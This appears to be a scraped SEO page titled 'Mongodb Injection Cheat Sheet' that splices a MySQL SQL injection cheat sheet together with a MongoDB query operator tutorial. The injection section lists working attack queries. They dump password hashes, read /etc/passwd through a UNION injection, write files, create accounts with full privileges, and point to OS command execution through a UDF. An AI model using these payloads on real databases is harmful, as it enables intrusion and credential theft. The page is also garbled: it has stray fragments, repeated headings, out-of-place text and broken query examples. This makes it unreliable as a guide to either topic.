Mongodb Injection Cheat Sheet

Posted on by



  1. Mongodb Cheat Sheet Pdf
  2. Mongodb Injection Cheat Sheet Printable
  3. Mongodb Injection Cheat Sheet Pdf

All you need to know about SQL Cheat Sheet 857.5k. NoSQL Tutorial Guide for Beginner 844.4k. All About SQL Joins and Subqueries 1.5k. MSBI Certification & Learning Path: My Success Story You Must Know 1.8k. This repository contains payload to test NoSQL Injections - cr0hn/nosqlinjectionwordlists. This repository contains payload to test NoSQL Injections - cr0hn/nosqlinjectionwordlists. Mongodb injection owasp wordlist payload nosql-injections Resources. MIT License Releases No releases published. Sponsor this project.

Some useful syntax reminders for SQL Injection into MySQL databases…

This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

Mongodb Injection Cheat SheetInjection

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

VersionSELECT @@version
CommentsSELECT 1; #comment
SELECT /*comment*/1;
Current UserSELECT user();
SELECT system_user();
List UsersSELECT user FROM mysql.user; — priv
List Password HashesSELECT host, user, password FROM mysql.user; — priv
Password CrackerJohn the Ripper will crack MySQL password hashes.
List PrivilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current DatabaseSELECT database()
List DatabasesSELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List ColumnsSELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List TablesSELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column NameSELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth CharSELECT substr(‘abcd’, 3, 1); # returns c
Bitwise ANDSELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> CharSELECT char(65); # returns A
Char -> ASCII ValueSELECT ascii(‘A’); # returns 65
CastingSELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);
String ConcatenationSELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If StatementSELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding QuotesSELECT 0×414243; # returns ABC
Time DelaySELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Make DNS RequestsImpossible?
Command ExecutionIf mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP AddressSELECT @@hostname;
Create UsersCREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete UsersDROP USER test1; — priv
Make User DBAGRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
Location of DB filesSELECT @@datadir;
Default/System Databasesinformation_schema (>= mysql 5.0)
mysql

Thanks

Jonathan Turner for @@hostname tip.

Tags: cheatsheet, database, mysql, pentest, sqlinjection

Posted in SQL Injection


/Title: MongoDB Query Operator Cheat SheetMeta Description: This MongoDB query operator cheat sheet provides a quick coding reference.Meta Keywords: MongoDB Query OperatorAuthor: orkbTemplate: Unstructured TutorialCategories: MongoDBTags: MongoDB, MongoDB query operator cheat sheetStatus:ID: 247/

Introduction

The MongoDB document database is a receptive repository for many documents. You want to find results that match your customized search criteria. One main key to accomplishing this task successfully is to use the appropriate query operator. With this MongoDB query operator cheat sheet, you’ll be able to do just that in record time.

Comparison Query Operators

  • Some MongoDB query operators help you to search documents that omit certain values.

  • An example is shown here where the $nin operator that returns documents in a collection called family. The documents have an age field. In that field, any age but 2 or 8 will be returned in the results. If any document doesn’t have an age field, it will be returned as well.

| Name | Description | Usage |

|:—–|:————|:—–:|

|$nin | Matches none of the values specified in an array.| db.family.find( { age: { $nin: [ 2, 8 ] } } )

  • The $ne operator shown in the example below returns different documents in the same family collection. The values it will omit are those that are female in the gender field. Use $ne when you want to search results that find all but those documents that are without a particular value you specify.

db.family.find( { gender: { $ne: 'female' } } )

  • In this example, the $lte operator will return results that have values of 17 or less found in the age field.

db.family.find( { age: { $lte: 17 } } )

  • The $in operator will look for equal values that match anything you specify in an array.

{ field: { $in: [<value1>, <value2>, .. <valuen> ] } }

  • The $eq operator match returns results that are exactly the same as the value you specify.

{ <field>: { $eq: <value> } }

  • The $gte operator searches for values greater than a value that is specified.

  • The example here shows the family collection as the database where documents in the gender field with a value or 7 or more are searched.

db.family.find( { gender: { $gt: 7 } } )

Array Query Operators

  • The $elemMatch operator returns documents if values match all specified conditions.

  • The example below find() operator looks for documents operation queries for documents where the value of the gender field is female. $elemMatch projection returns only the first matching element of the child array where the complexion field is fair.|

| Name | Description | Usage |

|:—–|:————|:—–:|

| $elemMatch | Returns a document if an element within the array field matches all of the $elemMatch conditions. | db.family.find( { gender: “”female”” }, { child: { $elemMatch: { complexion: “”fair”” } } } )

  • The operator $all returns documents that match all the elements in an array of a specified field.

{ <field>: { $all: [ <value1> , <value2> .. ] } }

  • The $size operator argument must return all documents specified by an array, so it must find the solution to the array. It matches all elements within a range.

  • This example shows the family collection where there are 2 elements in the query operator argument $size.

db.family.find( { field: { $size: 2 } } );

Logical Query Operators

  • The $not query operator selects documents that are not a particular value that is specified in the query. Use this query operator when you want to find all but a particular value.

  • An example below shows the use of the $not query to return certain documents in the family collection. The specified field is the age field and it should be a value of 15 or less than that. If a document doesn’t have an age field, it will also be placed in the search results.

| Name | Description | Usage |

Mongodb Cheat Sheet Pdf

|:—–|:————|:—–:|

| $not | Returns documents that don’t match the query expression.| db.family.find( { age: { $not: { $gt: 15 } } } )

  • The $nor query operator returns documents that fail all expressions in an array.| { $nor: [ { <expression1> }, { <expression2> }, .. { <expressionn> } ] }|

  • The $and query operator adds consecutive query clauses and returns documents that meet all the clauses criteria.

  • This example shows the $and operator and two clauses. All of documents will return that meet the entire criteria specified by the two clauses. A document that matches one but not the other clause will not be returned. Here, the seach is for the family collection. The age field has two clauses for documents to match:

(1) not equal to 5 and (2) the age field exists

db.family.find( { $and: [ { age: { $ne: 5 } }, { age: { $exists: true } } ] } )

  • The $or query returns documents that match one or more clauses.

  • The example shown queries the famiy collection. The age field of a document can either have a field value of 7 or less OR the complexion field value of “fair.”

|db.family.find( { $or: [ { age: { $lt: 7 } }, { complexion: 'fair' } ] } )

Evaluation Query Operators

  • The $where query operator This command will return documents from family collection where first name is equal to Yeshua.|

| Name | Description | Usage |

|:—–|:————|:—–|

|$where | Returns documents that match a JavaScript expression. | db.family.find( { $where: function() { return (this.name.first 'Yeshua') }}).pretty()

  • The $regex query operator returns documents the match the stated expression.

  • The example shown here returns documents where the first name has a value of “R.” The family collection is queried.

db.family.find( { ''name.first': { $regex: 'R.*' } } )

  • The $expr grants usage of expressions use of gathering of expressions within the query language.

  • The below example shows $expr the operator query to return documents where the number of finished aricles is more than the monthly article quota.

db.articleMonthly.find( { $expr: { $gt: [ '$articleFinished' , '$articleQuota' ] } } )

  • The $text query operator runs a text search for fields in a text index. The string should look like this:

{

$text:

{

$search: <string>,

$language: <string>,

Mongodb Injection Cheat Sheet

$caseSensitive: <boolean>,

$diacriticSensitive: <boolean>

}

}

  • The $search string queries the text index in the MongoDB database.
  • The $language argument is optional. It determines the searchs stop words list. You can select “None” for stop words and it will return documents that match the conditions of the string query.
Mongodb Injection Cheat Sheet
  • The $caseSensitive boolean flag is optional. Use it to disable or enable case sensitivity in a text index search. The default selection is case insensitivity, that is, the default is irrespective of case.
  • The $diacriticSensitive boolean flag is optional in version 3 text indexes. Use it to disable or enable diacritic marks or signs in a text index search. Earlier versions automatically default to diacritic insensitivity.

  • The $mod (modulo) query operator is used to return documents that match an indicated $mod expression. The syntax shows the specified remainder of a field’s given value. That value was divided by a number (divisor)

  • The $modhas changed starting with the 2.6 version. It passes an error when the remainder is fewer or more than the specified remainder in the array. Earlier versions didn’t pass an error when a remainder is zero.

  • Here’s an example where documents will be returned from the family Wednesday, october 26teach to be happy. colllection. The age field $mod is 7, the specified remainder is 0.

db.family.find( { age: { $mod: [ 7, 0 ] } } )

Element Query Operators

  • The $exists operator returns documents that match all of the criteria indicated in the value field.

  • The example below shows that in the family collection, documents will be returned REVIEW THIS PART ONLY

will documents in the family collection where the age field exists and its value does not equal 5 or 15.|

| Name | Description | Usage |

|:—–|:————|:—–|

|$exists| Matches documents that contain the indicated values.|db.family.find( { age: { $exists: true, $nin: [ 3, 21 ] } } )

Mongodb Injection Cheat Sheet Printable

  • The $type operator returns documents that are of a certain BSON type(3). An instance of that type is the field’s value, and this is what documents must match in order to be returned in the search results.

  • The query below is an example of the $type operator that returns documents that match the BSON types in the order given by type.

{ field: { $type: [ <bson type1='type1'> , <bson type2='type2'>, .. ] } }

Conclusion

Mongodb Injection Cheat Sheet Pdf

The MongoDB database query operator cheat sheet is an excellent resource for beginners and experts alike. It contains comparison, array, logical, evaluation, element and more commonly used query operators. Refer to it often. Think of the cheat sheet as your helpmate for efficient coding in all of your MongoDB projects.